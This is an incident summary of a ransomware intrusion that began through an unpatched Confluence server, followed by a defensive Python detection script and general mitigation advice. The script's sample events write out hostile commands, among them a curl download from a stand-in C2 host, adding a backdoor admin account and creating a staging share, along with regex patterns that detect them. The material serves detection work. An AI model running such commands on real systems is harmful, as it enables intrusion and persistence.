Another Confluence Bites the Dust: Falling to ELPACO-team Ransomware
Summary:
The intrusion, culminating in the deployment of ELPACO-team ransomware, began in late June 2024. Initial access was achieved through a publicly known template injection vulnerability (CVE-2023-22527) exploited on an unpatched Confluence server. The initial exploitation originated from IP address 45.227.254[.]124, which only executed the whoami command and then disconnected. Subsequently, a different IP address leveraged the same vulnerability to deploy a Metasploit payload (Meterpreter), establishing a C2 channel with 91.191.209[.]46 using curl. Notably, the initial attacking IP address that ran whoami later established a direct AnyDesk connection. The threat actor then engaged in short, seemingly exploratory but inconsequential AnyDesk sessions on the second day of the intrusion before pivoting to privilege escalation on the fourth day. Successful escalation to SYSTEM privileges via an RPCSS variant of named pipe impersonation enabled the creation of a local administrator account and the re-installation of AnyDesk for persistent remote access.
After establishing this alternative means of privileged access as their primary vector for the rest of the intrusion, the attacker conducted network reconnaissance using SoftPerfect's NetScan to identify high-value targets and unsuccessfully attempted to exploit Zerologon (CVE-2020-1472) against domain controllers. Credential access was then achieved through the deployment of tools such as Mimikatz and Impacket's Secretsdump, leading to the compromise of a domain administrator account, likely via LSASS dumping, given the use of NTLM hashes during lateral movement. Using the compromised domain admin credentials, lateral movement was carried out with Impacket wmiexec and RDP, and a new SMB share was created on the initially compromised Confluence server to stage additional post-exploitation tools. The final phase involved the deployment of ELPACO-team.exe ransomware across multiple servers approximately 62 hours after initial compromise, with lateral movement preceding the encryption. A negligible data transfer was observed via AnyDesk traffic, but no significant data exfiltration was detected prior to the ransomware deployment.
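The chain above (Confluence's web process spawning a shell for whoami and curl, a local admin account added, a staging SMB share created, and AnyDesk running as SYSTEM) is visible in process-creation telemetry. The following detection logic is an added example, not code from the report; the event field names, process image names and sample records are constructed assumptions.

```python
import re
from collections import namedtuple

# Confluence runs under Tomcat/Java; a shell spawned by that process is a
# strong signal of the template-injection exploitation described above.
CONFLUENCE_PARENTS = {"tomcat9.exe", "java.exe"}            # assumed image names
SHELLS = {"cmd.exe", "powershell.exe"}
RECON_OR_DOWNLOAD = re.compile(r"\b(whoami|curl)\b", re.I)  # whoami probe, curl to C2
ACCOUNT_ADD = re.compile(r"\bnet1?\s+(user|localgroup)\b.*\s/add\b", re.I)
SHARE_ADD = re.compile(r"\bnet1?\s+share\s+\S+=", re.I)     # new SMB share for staging

ProcEvent = namedtuple("ProcEvent", "host user parent image cmdline")  # simplified record

def classify(ev):
    """Return the alert names a single process-creation event triggers."""
    alerts = []
    if ev.parent.lower() in CONFLUENCE_PARENTS and ev.image.lower() in SHELLS:
        alerts.append("confluence_spawned_shell")
        if RECON_OR_DOWNLOAD.search(ev.cmdline):
            alerts.append("confluence_recon_or_download")
    if ACCOUNT_ADD.search(ev.cmdline):
        alerts.append("local_account_or_group_add")
    if SHARE_ADD.search(ev.cmdline):
        alerts.append("smb_share_created")
    # AnyDesk re-installed after the SYSTEM escalation: remote-access tool running as SYSTEM.
    if "anydesk" in ev.image.lower() and ev.user.upper().endswith("SYSTEM"):
        alerts.append("anydesk_run_as_system")
    return alerts

def scan(events):
    """Map host -> sorted list of distinct alerts, so one host's full chain is visible."""
    findings = {}
    for ev in events:
        for name in classify(ev):
            findings.setdefault(ev.host, set()).add(name)
    return {host: sorted(names) for host, names in findings.items()}

# Constructed sample events mirroring the chain in the summary; not real log data.
SAMPLE_EVENTS = [
    ProcEvent("CONF01", r"CONF01\confluence", "tomcat9.exe", "cmd.exe", "cmd.exe /c whoami"),
    ProcEvent("CONF01", r"CONF01\confluence", "tomcat9.exe", "cmd.exe", "cmd.exe /c curl -o C:\\Temp\\s.bin http://c2.example/s"),
    ProcEvent("CONF01", r"NT AUTHORITY\SYSTEM", "cmd.exe", "net.exe", "net localgroup administrators svc_backup /add"),
    ProcEvent("CONF01", r"NT AUTHORITY\SYSTEM", "cmd.exe", "net.exe", "net share tools=C:\\tools"),
    ProcEvent("CONF01", r"NT AUTHORITY\SYSTEM", "cmd.exe", "AnyDesk.exe", "AnyDesk.exe"),
    ProcEvent("WS05", r"CORP\alice", "explorer.exe", "cmd.exe", "cmd.exe /c whoami"),  # benign: not from Confluence
]
```

Running scan(SAMPLE_EVENTS) reports all five alert types for CONF01 and nothing for WS05, since a user running whoami from Explorer is ordinary activity.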
Security Officer Comments:
This incident highlights that known critical vulnerabilities pose a severe risk to unpatched systems, as the exploitation of a known Confluence vulnerability served as the initial entry point. The attacker's approach appears methodical, starting with reconnaissance and establishing persistence through multiple avenues, including AnyDesk. The unsuccessful Zerologon attempts and the subsequent focus on credential access using well-known tools like Mimikatz and Impacket underscore the attacker's familiarity with common post-exploitation TTPs. The rapid progression from initial compromise to domain administrator access and ultimately the deployment of ransomware on multiple servers, including backup and file servers, within approximately 62 hours, emphasizes the need for robust detection and response capabilities. The short, unexplained AnyDesk sessions early in the intrusion warrant further investigation to determine their purpose and whether they were deliberate. The lack of significant data exfiltration prior to ransomware deployment suggests the attacker's primary objective was disruption and financial gain through ransomed data, highlighting that this intrusion did not involve double extortion. The use of an offshoot of the publicly available ransomware variant Mimic further indicates a potentially less sophisticated threat actor, albeit one capable of effectively navigating and compromising a network using readily available tools.
Suggested Corrections:
IOCs are available here.
General Ransomware Suggested Corrections:
Back up your data, system images, and configurations, regularly test them, and keep the backups offline: Ensure that backups are regularly tested and that they are not connected to the business network, as many ransomware variants try to find and encrypt or delete accessible backups. Maintaining current backups offline is critical because if your network data is encrypted with ransomware, your organization can still restore systems.
Update and patch systems promptly: This includes maintaining the security of operating systems, applications, and firmware in a timely manner. Consider using a centralized patch management system; use a risk-based assessment strategy to drive your patch management program.
Test your incident response plan: There's nothing that shows the gaps in plans more than testing them. Run through some core questions and use those to build an incident response plan: Are you able to sustain business operations without access to certain systems? For how long? Would you turn off your manufacturing operations if business systems such as billing were offline?
Check your security team's work: Use a third-party penetration tester to test the security of your systems and your ability to defend against a sophisticated attack. Many ransomware criminals are aggressive and sophisticated and will find the equivalent of unlocked doors.
Segment your networks: There's been a recent shift in ransomware attacks – from stealing data to disrupting operations. It's critically important that your corporate business functions and manufacturing/production operations are separated and that you carefully filter and limit internet access to operational networks, identify links between these networks, and develop workarounds or manual controls to ensure ICS networks can be isolated and continue operating if your corporate network is compromised. Regularly test contingency plans such as manual controls so that safety-critical functions can be maintained during a cyber incident.
Train employees: Email remains the most vulnerable attack vector for organizations. Users should be trained on how to avoid and spot phishing emails.
Implement multi-factor authentication (MFA): External-facing assets that leverage single-factor authentication (SFA) are highly susceptible to brute-forcing attacks, password spraying, or unauthorized remote access using valid (stolen) credentials. Implementing MFA enhances security and adds an extra layer of protection.
Link(s):
https://thedfirreport.com/2025/05/19/another-confluence-bites-the-dust-falling-to-elpaco-team-ransomware/